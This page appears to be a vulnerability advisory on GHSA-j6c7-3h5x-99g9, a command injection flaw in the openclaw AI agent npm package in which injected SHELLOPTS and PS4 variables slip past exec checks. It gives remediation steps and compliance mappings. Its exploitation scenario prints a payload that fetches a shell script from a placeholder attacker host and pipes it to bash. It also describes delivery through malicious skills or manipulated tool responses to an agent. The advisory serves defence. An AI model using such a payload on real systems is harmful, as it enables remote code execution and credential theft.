GHSA-j6c7-3h5x-99g9: OpenClaw OS command injection

Q: Is GHSA-j6c7-3h5x-99g9 actively exploited?

No confirmed active exploitation of GHSA-j6c7-3h5x-99g9 has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-j6c7-3h5x-99g9?

1. Upgrade openclaw to version 2026.4.12 or later (current stable: 2026.4.14 — already includes the fix). 2. Audit all agent configurations for untrusted input paths that reach shell execution or tool invocation. 3. Apply process isolation for AI agent workloads using containers or sandboxing to limit blast radius if exploitation occurs. 4. Review any custom wrappers built on openclaw for shell environment variable handling. 5. Monitor for anomalous shell process spawning — particularly processes with modified SHELLOPTS or non-standard PS4 values — originating from AI agent processes. 6. Restrict openclaw agent OS permissions to least privilege; avoid running agents as root or with broad system access.

Q: What systems are affected by GHSA-j6c7-3h5x-99g9?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI agent pipelines, tool orchestration systems, agentic AI deployments.

Q: What is the CVSS score for GHSA-j6c7-3h5x-99g9?

No CVSS score has been assigned yet.

CISO Take

The openclaw npm AI agent package (versions 2026.2.22–2026.4.11) contains an OS command injection flaw where shell environment variable assignments in argv form — including high-risk controls like SHELLOPTS and PS4 — bypass exec preflight sanitization, enabling arbitrary command execution within AI agent workflows. While rated medium severity with no CVSS vector assigned, this vulnerability carries elevated contextual risk in agentic AI deployments where openclaw orchestrates external tool calls and shell interactions; the same package carries 135 prior CVEs, signaling systemic security debt rather than an isolated lapse. No public exploits or active exploitation (CISA KEV) are confirmed, but AIID #1368 — where openclaw's skill ecosystem was weaponized to deliver the AMOS credential stealer — illustrates the real-world impact potential of compromised openclaw deployments. Upgrade immediately to openclaw 2026.4.12 or later; no workaround exists short of patching.

Sources: GitHub Advisory ATLAS CISA KEV

What is the risk?

Contextual risk exceeds the nominal medium rating. Shell environment variable injection via SHELLOPTS and PS4 in an AI agent runtime can enable arbitrary command execution that cascades across automated pipelines with minimal user interaction. The package's history of 135 CVEs signals persistent security deficiencies rather than an isolated bug. Blast radius is bounded — only 4 direct downstream dependents — but AI agent deployments frequently run with elevated privileges and broad filesystem access, significantly amplifying post-exploitation impact. No EPSS data or public exploits are available, moderating immediate urgency.

How does the attack unfold?

Initial Access

Attacker delivers malicious argv-level environment variable assignments (PS4, SHELLOPTS) via a crafted third-party skill, manipulated tool response, or direct input to an openclaw-based AI agent.

AML.T0010.005

Defense Evasion

Vulnerable openclaw exec preflight fails to detect env-argv assignment injection forms, allowing SHELLOPTS or PS4 to pass undetected into the shell environment during tool invocation.

AML.T0107

Execution

Shell spawned by the agent inherits the injected environment variables; PS4 debug prefix or SHELLOPTS manipulation triggers attacker-controlled commands in the agent's OS execution context.

AML.T0050

Impact

Attacker achieves arbitrary code execution within the AI agent process, enabling credential theft, sensitive data exfiltration, or persistent backdoor installation on the agent host.

AML.T0025

Initial Access

Attacker delivers malicious argv-level environment variable assignments (PS4, SHELLOPTS) via a crafted third-party skill, manipulated tool response, or direct input to an openclaw-based AI agent.

AML.T0010.005

Defense Evasion

Vulnerable openclaw exec preflight fails to detect env-argv assignment injection forms, allowing SHELLOPTS or PS4 to pass undetected into the shell environment during tool invocation.

AML.T0107

Execution

Shell spawned by the agent inherits the injected environment variables; PS4 debug prefix or SHELLOPTS manipulation triggers attacker-controlled commands in the agent's OS execution context.

AML.T0050

Impact

Attacker achieves arbitrary code execution within the AI agent process, enabling credential theft, sensitive data exfiltration, or persistent backdoor installation on the agent host.

AML.T0025

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
OpenClaw	npm	>= 2026.2.22, < 2026.4.12	`2026.4.12`
4 dependents 36% patched ~3d to patch Full package profile →

Do you use OpenClaw? You're affected.

How severe is it?

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Moderate

What should I do?

6 steps

Upgrade openclaw to version 2026.4.12 or later (current stable: 2026.4.14 — already includes the fix).
Audit all agent configurations for untrusted input paths that reach shell execution or tool invocation.
Apply process isolation for AI agent workloads using containers or sandboxing to limit blast radius if exploitation occurs.
Review any custom wrappers built on openclaw for shell environment variable handling.
Monitor for anomalous shell process spawning — particularly processes with modified SHELLOPTS or non-standard PS4 values — originating from AI agent processes.
Restrict openclaw agent OS permissions to least privilege; avoid running agents as root or with broad system access.

How is it classified?

Code Execution Supply Chain Auth Bypass Agent Framework Plugin AML.T0010.001 - AI Software AML.T0010.005 - AI Agent Tool AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2 - AI system supply chain

NIST AI RMF

MAP 1.6 - Risks associated with third-party entities are documented

OWASP LLM Top 10

LLM05 - Supply Chain Vulnerabilities LLM08 - Excessive Agency

Frequently Asked Questions

What is GHSA-j6c7-3h5x-99g9?

The openclaw npm AI agent package (versions 2026.2.22–2026.4.11) contains an OS command injection flaw where shell environment variable assignments in argv form — including high-risk controls like SHELLOPTS and PS4 — bypass exec preflight sanitization, enabling arbitrary command execution within AI agent workflows. While rated medium severity with no CVSS vector assigned, this vulnerability carries elevated contextual risk in agentic AI deployments where openclaw orchestrates external tool calls and shell interactions; the same package carries 135 prior CVEs, signaling systemic security debt rather than an isolated lapse. No public exploits or active exploitation (CISA KEV) are confirmed, but AIID #1368 — where openclaw's skill ecosystem was weaponized to deliver the AMOS credential stealer — illustrates the real-world impact potential of compromised openclaw deployments. Upgrade immediately to openclaw 2026.4.12 or later; no workaround exists short of patching.

Is GHSA-j6c7-3h5x-99g9 actively exploited?

No confirmed active exploitation of GHSA-j6c7-3h5x-99g9 has been reported, but organizations should still patch proactively.

How to fix GHSA-j6c7-3h5x-99g9?

1. Upgrade openclaw to version 2026.4.12 or later (current stable: 2026.4.14 — already includes the fix). 2. Audit all agent configurations for untrusted input paths that reach shell execution or tool invocation. 3. Apply process isolation for AI agent workloads using containers or sandboxing to limit blast radius if exploitation occurs. 4. Review any custom wrappers built on openclaw for shell environment variable handling. 5. Monitor for anomalous shell process spawning — particularly processes with modified SHELLOPTS or non-standard PS4 values — originating from AI agent processes. 6. Restrict openclaw agent OS permissions to least privilege; avoid running agents as root or with broad system access.

What systems are affected by GHSA-j6c7-3h5x-99g9?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI agent pipelines, tool orchestration systems, agentic AI deployments.

What is the CVSS score for GHSA-j6c7-3h5x-99g9?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

agent frameworksAI agent pipelinestool orchestration systemsagentic AI deployments

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0010.005 AI Agent Tool

AML.T0050 Command and Scripting Interpreter

AML.T0053 AI Agent Tool Invocation

AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.6.2

NIST AI RMF: MAP 1.6

OWASP LLM Top 10: LLM05, LLM08

What are the technical details?

Original Advisory

## Summary Shell-wrapper detection missed env-argv assignment injection forms. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `>= 2026.2.22 < 2026.4.12` - Patched versions: `>= 2026.4.12` ## Impact Exec preflight handling missed shell-wrapper and argv-level environment assignment forms that could affect execution semantics, including high-risk shell environment controls. ## Technical Details The fix broadens shell-wrapper detection and blocks environment assignments in argv forms. High-risk shell variables such as `SHELLOPTS` and `PS4` are covered by the host environment security policy. ## Fix The issue was fixed in #65717. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `8f8492d172f4c5b4fd7dd9a47855ed620c8770ab` - PR: #65717 ## Release Process Note Users should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @decsecre583 for reporting this issue.

Exploitation Scenario

An attacker targeting a production AI agent deployment running vulnerable openclaw crafts an input — via a malicious third-party skill, a manipulated tool response, or direct argv injection — embedding environment variable assignments such as PS4='$(curl attacker.com/shell.sh|bash)' or SHELLOPTS=xtrace. When openclaw's exec preflight processes the invocation, the missed detection for env-argv assignment forms allows these variables to pass into the shell environment. Upon shell spawning during tool execution, PS4 or SHELLOPTS triggers the injected command in the agent's security context, enabling reverse shell establishment, credential exfiltration, or lateral movement through systems accessible to the agent — mirroring the AMOS stealer delivery pattern documented in AIID #1368.

Weaknesses (CWE)

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Primary

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

[Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
[Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.